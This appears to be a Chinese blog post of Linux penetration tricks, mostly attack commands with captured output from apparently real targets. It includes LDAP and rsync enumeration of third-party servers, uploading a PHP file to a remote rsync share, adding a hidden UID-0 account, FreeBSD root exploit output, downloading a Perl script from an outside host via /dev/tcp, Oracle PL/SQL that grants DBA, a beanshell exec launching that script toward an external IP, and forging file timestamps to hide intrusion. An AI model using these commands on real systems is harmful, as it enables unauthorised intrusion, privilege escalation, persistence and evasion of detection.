Linux渗透技巧+实战

最新推荐文章于 2024-05-12 13:19:07 发布
最新推荐文章于 2024-05-12 13:19:07 发布
阅读量1.5k 收藏 3
点赞数
分类专栏: Linux Hacking
Hacking 同时被 2 个专栏收录
264 篇文章 1 订阅
订阅专栏
Linux
116 篇文章 0 订阅
订阅专栏

一.ldap渗透技巧
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置

3.查找管理员信息
匿名方式
ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2
有密码形式
ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置

3.查找管理员信息
匿名方式
ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2
有密码形式
ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:
1.返回所有的属性
ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

渗透使用的脚本见附件

二. NFS渗透技巧
showmount -e ip
列举IP

渗透动画:

三.rsync渗透技巧
1.查看rsync服务器上的列表
rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

看相应的下级目录(注意一定要在目录后面添加上/)

rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
成功上传
楼上就是实战的技巧

四.squid渗透技巧
nc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
动画地址和密码:
http://www.neeao.com/share/cnbir … %BC%8F%E6%B4%9E.rar

五.SSH端口转发
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

六.joomla渗透小技巧
确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码
index.php?option=com_user&view=reset&layout=confirm

七: Linux添加UID为0的root用户
useradd -o -u 0 nothack

八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*

  • calling nmount()
    * [!] nmount error: -1030740736
    * nmount: Unknown error: -1030740736
    * [argp@julius ~]$ id
    * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)

    九.ldap技巧更新(xi4oyu提供)
    ldapsearch -x -s base -b “” “objectClass=*” +
    能够获得LDAP SERVER version naming context 加密选项,认证方式等详细的信息。

    ldapsearch -x -b ” -s base ‘(objectclass=*)’ namingContexts

    获取namingContexts

    具体的 oid信息可以在:http://www.alvestrand.no/objectid/top.html查到

    列树

    ldapsearch -x -H ldap://xxxxx/

    猜测,看是否可写

    ldapadd …..

    找slapd.conf

    openldap/ldap.conf

    local:

    slapcat

    十.memcached渗透技巧
    memcached telnet操作

    telnet localhost 11211
    //保存
    set good 32 0 10
    helloworld
    STORED

    //取回
    gets good
    VALUE good 32 10 10
    helloworld
    END

    //替换
    replace good 32 0 10
    worldhello
    STORED
    get good
    VALUE good 32 10
    worldhello
    END

    //尾部添加
    append good 32 0 5
    after
    STORED
    get good
    VALUE good 32 15
    worldhelloafter
    END

    //头部添加
    prepend good 32 0 6
    before
    STORED
    get good
    VALUE good 32 21
    beforeworldhelloafter
    END

    //删除
    delete good
    DELETED
    get good
    END

    delete good
    NOT_FOUND

    cas good 32 0 10 hel
    helloworld
    EXISTS

    gets good
    VALUE good 32 10 10
    helloworld
    END

    cas bad 32 0 10 good
    worldhello
    NOT_FOUND

    //统计
    stats items
    STAT items:1:number 1
    STAT items:1:age 24
    STAT items:1:evicted 0
    STAT items:1:outofmemory 0
    END

    stats sizes
    96 1
    END

    stats slabs
    STAT 1:chunk_size 88
    STAT 1:chunks_per_page 11915
    STAT 1:total_pages 1
    STAT 1:total_chunks 11915
    STAT 1:used_chunks 11914
    STAT 1:free_chunks 1
    STAT 1:free_chunks_end 11913
    STAT 2:chunk_size 112
    STAT 2:chunks_per_page 9362
    STAT 2:total_pages 1
    STAT 2:total_chunks 9362
    STAT 2:used_chunks 9361
    STAT 2:free_chunks 1
    STAT 2:free_chunks_end 9361
    STAT 5:chunk_size 232
    STAT 5:chunks_per_page 4519
    STAT 5:total_pages 1
    STAT 5:total_chunks 4519
    STAT 5:used_chunks 4518
    STAT 5:free_chunks 1
    STAT 5:free_chunks_end 4518
    STAT active_slabs 3
    STAT total_malloced 3145472
    END

    stats items
    STAT items:1:number 1
    STAT items:1:age 1768
    STAT items:1:evicted 0
    STAT items:1:outofmemory 0
    END

    stats
    STAT pid 18261
    STAT uptime 528593
    STAT time 1237277383
    STAT version 1.2.6
    STAT pointer_size 32
    STAT rusage_user 0.004999
    STAT rusage_system 0.015997
    STAT curr_items 1
    STAT total_items 2
    STAT bytes 66
    STAT curr_connections 2
    STAT total_connections 13
    STAT connection_structures 3
    STAT cmd_get 11
    STAT cmd_set 8
    STAT get_hits 2
    STAT get_misses 9
    STAT evictions 0
    STAT bytes_read 1342
    STAT bytes_written 8752
    STAT limit_maxbytes 134217728
    STAT threads 1
    END

    使用usr/bin/perl /root/memcached-1.2.6/scripts/memcached-tool localhost:11211
    output
    # Item_Size   Max_age 1MB_pages Count   Full?
    1      88 B     1531 s       1       1      no
    2     112 B        0 s       1       0      no
    5     232 B        0 s       1       0      no

    # slab class编号
    Item_Size Chunk大小
    Max_age LRU内最旧的记录的生存时间
    1MB_pages 分配给Slab的页数
    Count Slab内的记录数
    Full? Slab内是否含有空闲chunk

    十一.无wget下载文件
    假设要下载http://yese.yi.org/c.pl

    exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

    当然http头你要自己去掉

    当然,你用nc -l -p 80 <c.pl 就不用这么麻烦了

    十二.ORACLE 11G提权
    DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

    判断登陆权限
    select * from session_privs;
    CREATE SESSION

    select * from session_roles;

    select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = ‘GREMLIN(用户名)’;

    DESC JAVA$POLICY$

    DECLARE
    POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
    CURSOR C1 IS SELECT ‘GRANT’ USER(), ‘SYS’, ‘java.io.FilePermission’, ‘<<ALL FILES>>’, ‘execute’, ‘ENABLE’ FROM DUAL;
    BEGIN
    OPEN C1;
    FETCH C1 BULK COLLECT INTO POL;
    CLOSE C1;
    DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
    END;
    /

    connect / as sysdba
    COL TYPE_NAME FOR A30;
    COL NAME FOR A30;
    COL_ACTION FOR A10;
    SELECT TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = ‘用户’;

    connect 普通用户
    set serveroutput on
    exec dbms_java.set_output(10000);

    SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA(‘ID’, ‘oracle/aurora/rdbms/DbmsJava’, ‘SYS’, ‘writeOutputToFile’, ‘TEXT’, NULL, NULL, NULL, NULL,0,1,1,1,1,0, ‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;’BEGIN EXECUTE IMMEDIATE ”GRANT DBA TO 用户”; END;’, ‘BEGIN NULL; END;’) FROM DUAL;

    EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(‘NO_SUCH_SUBSCRIPTION’, SYSDATE());

    set role dba;

    select * from session_privs;

    EXEC SYS.VULNPROC(‘FOO”||DBMS_JAVA.SET_OUTPUT_TO_SQL(“ID”,”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE”"GRANT DBA TO PUBLIC”";DBMS_OUTPUT.PUT_LINE(:1);END;”,”TEXT”)||”BAR’);

    SELECT DBMS_JAVA.RUNJAVA(‘oracle/aurora/util/Test’) FROM DUAL;

    SET ROLE DBA;

    十三:beanshell渗透技巧
    exec(“/usr/bin/perl /var/tmp/c.pl 218.56.57.151 53″);
    实例:XXX易多台beanshell漏洞咋不发布,等漏洞修补发布

    十四.cvs渗透技巧
    CVSROOT/passwd UNIX SHA1的密码文件
    CVSROOT/readers
    CVSROOT/writers
    CVS/Root
    CVS/Entries 更新的文件和目录内容
    CVS/Repository

    十五.修改上传文件时间戳(掩盖入侵痕迹)
    touch -r 老文件时间戳 新文件时间戳

    十六.Weblogin Script Tool(WLST)

    写入到\\config\\config.xml

    1.进行修改:
    \wlserver_10.0\server\bin\setWLSenv.sh
    2.启动WLST
    java weblogic.WLST

    wls:/offline> connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)
    wls:/bbk/serverConfig> help()

    wls:/bbk/serverConfig> edit()
    wls:/bbk/serverConfig> cd(‘Servers’)
    wls:/bbk/serverConfig/Server-cnbird> cd(‘Log’)
    wls:/bbk/serverConfig/Server-cnbird/log> cd(‘Server-cnbird’)
    wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
    wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set(‘FileCount’, ‘4′)
    wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
    wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change
    wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
    wls:/offline> exit()

    3.批处理:
    保存以上命令为cnbird.py
    connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)
    cd(‘Servers’)
    cd(‘Log’)
    cd(‘Server-cnbird’)
    startEdit()
    set(‘FileCount’, ‘4′)
    save()
    然后执行java weblogic.WLST cnbird.py

    一句话修改linux密码(来自包总blog)
    echo “11111″|passwd –stdin user111
    echo “cnbird:cnbird”|chpasswd

7禧
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux提权思路+实战 _ Mugen1
08-03
以下是对Linux提权思路和实战技巧的详细说明。 首先,了解Linux发行版本及其内核是非常基础的步骤。Linux有众多发行版,如CentOS、Red Hat、Ubuntu和Kali Linux等,它们基于Linux内核并包含不同的软件包和服务。...
Day6——提权学习之Oracle数据库提权学习总结
0nc3的博客
12-22 594
0x00 Oracle提权基础 1、Oracle权限分配 1.1 系统权限 系统规定用户使用数据库的权限。(系统权限是对用户而言)。 系统权限分类 DBA: 拥有全部特权,是系统最高权限,只有DBA才可以创建数据库结构。 RESOURCE:拥有Resource权限的用户只可以创建实体,不可以创建数据库结构。 CONNECT:拥有Connect权限的用户只可以登录Oracle,不可以创建实体,不可以...
oracle11g提权漏洞
weixin_34240657的博客
11-14 602
David Litchfield真是牛人中的牛人,oracle11g,只要是有create session权限的用户,就能执行系统命令: DECLARE ...
linux内网渗透技巧总结
最新发布
渗透测试研究中心
05-12 649
known_hosts格式有两种,取决于你的~/.ssh/config文件中的HashKnownHosts字段的设置,有可能是明文也有可能是一段哈希字符串。如果没有~/.ssh/config文件,这取决于/etc/ssh/ssh_config文件中的该字段。今后,当你使用 PuTTY 登录时,可以在左侧的 Connection -> SSH -> Auth 中的 Private key file for authentication: 处选择你的私钥文件,然后即可登录了,过程中只需输入密钥锁码即可。
linux的ldap攻击脚本,PentesterLab 新手教程(三) :LDAP攻击
weixin_34522296的博客
05-05 227
原标题:PentesterLab 新手教程(三) :LDAP攻击PentesterLab 简介web for pentester是国外安全研究者开发的的一款渗透测试平台,包含以下主要的漏洞:Code injection (代码注入)Commands injection(命令行注入)XSS(跨站脚本)SQL injections(sql注入)File include(文件包含)LDAP attack...
【原创】oracle提权执行命令工具oracleShell v0.1
weixin_33963594的博客
11-30 409
帮一个兄弟渗透的过程中在内网搜集到了不少oracle连接密码,oracle这么一款强大的数据库,找了一圈发现没有一个方便的工具可以直接通过用户名密码来提权的。想起来自己之前写过一个oracle的连接工具,拿出来分享下。工具没有用到什么新的技术,希望能给做渗透测试的兄弟们节省一点时间。 支持三种工作模式: 1.普通模式:   前提是拥有一个普通的oracle连接账号,不需要DBA权限,可...
oracle用户获取datameta权限,Oracle数据库提权(低权限提升至dba)
weixin_39850062的博客
04-11 755
0x01 Oracle存储过程”缺陷”在 Oracle 的存储过程中,有一个有趣的特点:运行权限。运行权限分为两种,definer和 invoker。definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户。运行权限在函数创建时就已经被钦定了,默认为 definer。说白了,如果我们用低权限用户去运行DBA权限用户创建的存储过程,我们在调用时就可以额访问DBA资源,使用DB...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
《Web渗透技术及实战案例解析第2版》
08-26
本书最大的特色是实用性高、实战性强、思维灵活,内容主要包括Web渗透必备技术、常见的加密与解密攻击、Web漏洞扫描、常见的文件上传漏洞及利用、SQL注入漏洞及利用、高级渗透技术、Windows和Linux提权、Windows和...
Linux下的渗透技术总结
06-08
Linux下的渗透技术总结】 在网络安全领域,渗透测试是一种授权的攻击模拟,旨在评估系统安全性。在Linux环境中,渗透技术涉及一系列步骤,包括目标发现、信息搜集、漏洞利用、提权和后门植入。以下是对这些关键...
【权限提升】六种数据库提权&口令获取
今天是几号的博客
02-15 1682
MSF会将dll文件写入lib\plugin\目录下(前提是该目录存在,需手工创建),该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。绑定需要访问数据库的IP。
渗透测试端口利用总结
Phoebus2617的博客
04-26 257
信息收集必备 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务 劫持/欺骗 110 pop3 爆破/嗅探 139 Samba服务 爆破/未授权访问/远程命令执行 143 Imap协议 爆破 161 SN
oracle cdc机制异步模式hotlog学习笔记
XCXCXCXCX
11-29 1199
大致流程: 系统用户配置:创建用户、给予相应权限、设置数据库模式 发布者配置:准备改变表、创建改变集、创建改变表、激活改变集、将改变表授权给订阅者 订阅者配置:创建订阅集、创建订阅表、激活订阅表、更新或情况扩展窗口、查询扩展窗口上的数据(可查询增量数据) sys用户操作: shutdown immediate; startup mount; alter database
mssql&oracle数据库提权
m0_62207170的博客
03-19 1137
mssql&oracle数据库提权
红蓝对抗之Linux内网渗透
Tencent_SRC的博客
12-11 7045
文|腾讯蓝军 jumbo前言上篇内网渗透(附录1)主要讲的是Windows这块,最近知识星球“腾讯安平密友圈”提到了一个问题“为什么内网渗透偏向于Windows”,笔者也在下面进行了相关...
Linux操作系统渗透测试
明裕学长的博客
05-24 4840
Linux操作系统渗透测试 任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 1.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag提交; 在终端中输入 nmap -O 172.16.105.25
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 2918
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值